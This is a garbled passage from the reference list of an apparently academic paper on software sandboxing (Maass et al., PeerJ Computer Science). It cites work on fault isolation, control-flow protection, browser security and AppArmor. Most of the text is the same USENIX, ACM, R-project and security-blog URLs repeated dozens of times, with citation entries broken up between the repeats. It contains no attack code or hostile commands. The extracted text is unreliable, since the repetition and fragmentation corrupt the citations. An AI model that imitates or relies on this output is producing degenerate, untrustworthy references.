https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin https://www.usenix.org/conference/atc14/technical-sessions/presentation/li_yanlin http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1251398.1251414 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1929820.1929852 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=1267336.1267351 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dl.acm.org/citation.cfm?id=882493.884390 http://dx.doi.org/10.1145/79173.79113 http://dx.doi.org/10.7717/peerj-cs.43 Nguyen-Tuong A, Hiser J, Co M, Davidson JW, Knight JC, Kennedy N, Melski D, Ella W, Hyde D. 2014. To B or not to B: blessing OS commands with software DNA shotgun sequencing. In: Dependable computing conference. Washington, DC: IEEE, 238–249. Nikolaev R, Back G. 2013. VirtuOS: an operating system with kernel virtualization. In: ACM symposium on operating systems principles (SOSP) (SOSP ’13). New York: ACM, 116–132. Niu B, Tan G. 2013. Monitor integrity protection with space efficiency and separate compilation. In: ACM conference on computer and communications security (CCS) (CCS ’13). New York: ACM, 199–210. Oda T, Wurster G, Van Oorschot PC, Somayaji A. 2008. SOMA: mutual approval for included content in web pages. In: ACM conference on computer and communications security (CCS) (CCS ’08). New York: ACM, 89–98. Owen C, Grove D, Newby T, Murray A, North C, Pope M. 2011. PRISM: program replication and integration for seamless MILS. In: IEEE symposium on security and privacy. Washington, DC: IEEE, 281–296. Pappas V, Polychronakis M, Keromytis AD. 2012. Smashing the gadgets: hindering return-oriented programming using in-place code randomization. In: IEEE symposium on security and privacy (SP ’12). Washington, DC: IEEE Computer Society, 601–615. Parno B, McCune JM, Wendlandt D, Andersen DG, Perrig A. 2009. CLAMP: practical prevention of large-scale data leaks. In: IEEE symposium on security and privacy (SP ’09). Washington, DC: IEEE Computer Society, 154–169. Payer M, Hartmann T, Gross TR. 2012. Safe loading—a foundation for secure execution of untrusted programs. In: IEEE symposium on security and privacy (SP ’12). Washington, DC: IEEE Computer Society, 18–32. Payne BD, Carbone M, Sharif M, Lee W. 2008. Lares: an architecture for secure active monitoring using virtualization. In: IEEE symposium on security and privacy (SP ’08). Washington, DC: IEEE Computer Society, 233–247. Petroni Jr NL, Hicks M. 2007. Automated detection of persistent kernel control-flow attacks. In: ACM conference on computer and communications security (CCS) (CCS ’07). New York: ACM, 103–115. Politz JG, Eliopoulos SA, Guha A, Krishnamurthi S. 2011. ADsafety: type-based verification of javascript sandboxing. In: USENIX security (SEC’11). Berkeley: USENIX Association, 12–12. Available at http://dl.acm.org/citation.cfm?id=2028067.2028079. Provos N. 2003. Improving host security with system call policies. In: USENIX security (SSYM’03). Berkeley: USENIX Association, 18–18. Available at http://dl.acm.org/citation.cfm?id=1251353. 1251371. R Core Team. 2014. R: a language and environment for statistical computing. Vienna: R Foundation for Statistical Computing. Available at http://www.R-project.org/. Reis C, Dunagan J, Wang HJ, Dubrovsky O, Esmeir S. 2006. BrowserShield: vulnerability-driven filtering of dynamic HTML. In: USENIX symposium on operating systems design and implementation (OSDI) (OSDI ’06). Berkeley: USENIX Association, 61–74. Available at http: //dl.acm.org/citation.cfm?id=1298455.1298462. Ringenburg MF, Grossman D. 2005. Preventing format-string attacks via automatic and efficient dynamic checking. In: ACM conference on computer and communications security (CCS) (CCS ’05). New York: ACM, 354–363. Rodes BD, Knight JC, Nguyen-Tuong A, Hiser JD, Co M, Davidson JW. 2015. A case study of security case development. In: Engineering systems for safety. Newcastle upon Tyne: Safety-Critical Systems Club, 187–204. Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 34/36 https://peerj.com/computer-science/ http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=2028067.2028079 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://dl.acm.org/citation.cfm?id=1251353.1251371 http://www.R-project.org/ http://www.R-project.org/ http://www.R-project.org/ http://www.R-project.org/ http://www.R-project.org/ http://www.R-project.org/ http://www.R-project.org/ http://www.R-project.org/ http://www.R-project.org/ http://www.R-project.org/ http://www.R-project.org/ http://www.R-project.org/ http://www.R-project.org/ http://www.R-project.org/ http://www.R-project.org/ http://www.R-project.org/ http://www.R-project.org/ http://www.R-project.org/ http://www.R-project.org/ http://www.R-project.org/ http://www.R-project.org/ http://www.R-project.org/ http://www.R-project.org/ http://www.R-project.org/ http://www.R-project.org/ http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dl.acm.org/citation.cfm?id=1298455.1298462 http://dx.doi.org/10.7717/peerj-cs.43 Rosenberg D. 2012. Poking holes in AppArmor profiles. Available at http://blog.azimuthsecurity. com/2012/09/poking-holes-in-apparmor-profiles.html (accessed 30 April 2015). Saxena P, Molnar D, Livshits B. 2011. SCRIPTGARD: automatic context-sensitive sanitization for large-scale legacy web applications. In: ACM conference on computer and communications security (CCS) (CCS ’11). New York: ACM, 601–614. Schneider FB. 1997. Towards fault-tolerant and secure agentry. In: International workshop on distributed algorithms (WDAG ’97). London: Springer-Verlag, 1–14. Available at http://dl.acm. org/citation.cfm?id=645954.675785. Schreier M. 2012. Qualitative content analysis in practice. 1st edition. Thousand Oaks: SAGE Publications Ltd. Schreuders ZC, McGill T, Payne C. 2013. The state of the art of application restrictions and sandboxes: a survey of application-oriented access controls and their shortfalls. Computers & Security 32:219–241 DOI 10.1016/j.cose.2012.09.007. Sehr D, Muth R, Biffle C, Khimenko V, Pasko E, Schimpf K, Yee B, Chen B. 2010. Adapting software fault isolation to contemporary CPU architectures. In: USENIX security (USENIX Security’10). Berkeley: USENIX Association, 1–1. Available at http://dl.acm.org/citation.cfm? id=1929820.1929822. Seshadri A, Luk M, Qu N, Perrig A. 2007. SecVisor: a tiny hypervisor to provide lifetime kernel code integrity for commodity oses. In: ACM symposium on operating systems principles (SOSP) (SOSP ’07). New York: ACM, 335–350. Siefers J, Tan G, Morrisett G. 2010. Robusta: taming the native beast of the JVM. In: ACM conference on computer and communications security (CCS) (CCS ’10). New York: ACM, 201–211. Spearman C. 1904. The proof and measurement of association between two things. American Journal of Psychology 15:88–103. Stuckman J, Purtilo J. 2014. Mining security vulnerabilities from linux distribution metadata. In: Software reliability engineering workshops (ISSREW). Washington, DC: IEEE, 323–328. Sun W, Sekar R, Poothia G, Karandikar T. 2008. Practical proactive integrity preservation: a basis for malware defense. In: IEEE symposium on security and privacy (SP’08). Washington, DC: IEEE Computer Society, 248–262. Szekeres L, Payer M, Wei T, Song D. 2013. Eternal war in memory. In: IEEE symposium on security and privacy (SP ’13). Washington, DC: IEEE Computer Society, 48–62. Tang J. 2015. Exploring control flow guard in windows 10. Available at http://blog.trendmicro. com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows-10/ (accessed 10 September 2015). Tang S, Mai H, King ST. 2010. Trust and protection in the Illinois browser operating system. In: USENIX symposium on operating systems design and implementation (OSDI) (OSDI’10). Berkeley: USENIX Association, 1–8. Available at http://dl.acm.org/citation.cfm?id=1924943. 1924945. Wahbe R, Lucco S, Anderson TE, Graham SL. 1993. Efficient software-based fault isolation. ACM SIGOPS Operating Systems Review 27(5):203–216 DOI 10.1145/173668.168635. Wallach DS, Balfanz D, Dean D, Felten EW. 1997. Extensible security architectures for Java. In: Symposium on operating systems principles (SOSP ’97). New York: ACM, 116–128. Wang HJ, Fan X, Howell J, Jackson C. 2007. Protection and communication abstractions for web browsers in mashupOS. In: ACM symposium on operating systems principles (SOSP) (SOSP ’07). New York: ACM, 1–16. Maass et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.43 35/36 https://peerj.com/computer-science/ http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html http://blog.azimuthsecurity.com/2012/09/poking-holes-in-apparmor-profiles.html 